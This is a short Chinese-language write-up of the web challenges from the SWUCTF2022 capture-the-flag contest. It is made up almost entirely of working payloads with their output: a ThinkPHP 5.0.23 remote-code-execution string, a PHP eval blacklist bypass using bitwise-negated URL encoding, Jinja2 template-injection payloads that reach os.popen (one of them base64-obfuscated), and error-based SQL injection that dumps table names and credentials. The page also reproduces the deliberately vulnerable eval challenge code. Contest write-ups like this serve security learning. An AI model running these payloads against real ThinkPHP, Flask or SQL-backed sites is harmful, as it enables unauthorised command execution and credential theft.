SWUCTF2022 Web Writeups | CTF
本文部分信息可能已发生改变,请自行甄别
THINKPHP?
?s=captcha
V5.0.23
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=env
PHP? Eval?
<?php
highlight_file(__FILE__);
error_reporting(0);
$blacklist = ["system", "ini_set", "exec", "scandir", "shell_exec", "proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
$blacklist = array_merge($blacklist, get_defined_functions()['internal']);
foreach($blacklist as $i){
if(stristr($_GET[cmd], $i)!==false){
die('hack');
}
}
eval($_GET[cmd]);
?>
URL编码取反绕过
php -r "var_dump(urlencode(~'system'));" => string(18) "%8C%86%8C%8B%9A%92"
php -r "var_dump(urlencode(~'cat /flag'));" => string(27) "%9C%9E%8B%DF%D0%99%93%9E%98"
?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);
Py?py
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag.txt').read()")}}
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['ZXZhbA=='.decode('base64')]("X19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IGZsYWcudHh0JykucmVhZCgp".decode('base64'))}}
SQL? no sqlmap
报错注入
'or(updatexml(1,concat(0x7e,version(),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2Cversion%28%29%2C0x7e%29%2C1%29%29%23
~10.3.18-MariaDB~
'or(updatexml(1,concat(0x7e,database(),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2C1%29%29%23
~vaalacat~
'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28select%28group_concat%28table_name%29%29from%28information_schema.tables%29where%28table_schema%29like%28database%28%29%29%29%2C0x7e%29%2C1%29%29%23
过滤了 select
双写绕过
'or(updatexml(1,concat(0x7e,(selselectect(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28table_name%29%29from%28information_schema.tables%29where%28table_schema%29like%28database%28%29%29%29%2C0x7e%29%2C1%29%29%23
~vaala~
'or(updatexml(1,concat(0x7e,(selselectect(group_concat(column_name))from(information_schema.columns)where(table_name)like('vaala')),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28column_name%29%29from%28information_schema.columns%29where%28table_name%29like%28%27vaala%27%29%29%2C0x7e%29%2C1%29%29%23
~id,username,password~
'or(updatexml(1,concat(0x7e,(selselectect(group_concat(username,'~',password))from(vaala)),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28username%2C%27~%27%2Cpassword%29%29from%28vaala%29%29%2C0x7e%29%2C1%29%29%23
「~vaala~flag{ccb506e8-afa0-46b8-b」
'or(updatexml(1,concat(0x7e,(selselectect(group_concat((right(password,30))))from(vaala)),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28%28right%28password%2C30%29%29%29%29from%28vaala%29%29%2C0x7e%29%2C1%29%29%23
「8-afa0-46b8-b177-e3a2fc5592b6}」
flag{ccb506e8-afa0-46b8-b177-e3a2fc5592b6}